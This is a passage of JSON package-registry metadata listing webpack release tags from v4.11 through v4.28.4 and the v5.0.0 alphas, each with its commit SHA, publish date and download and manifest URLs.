:"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2f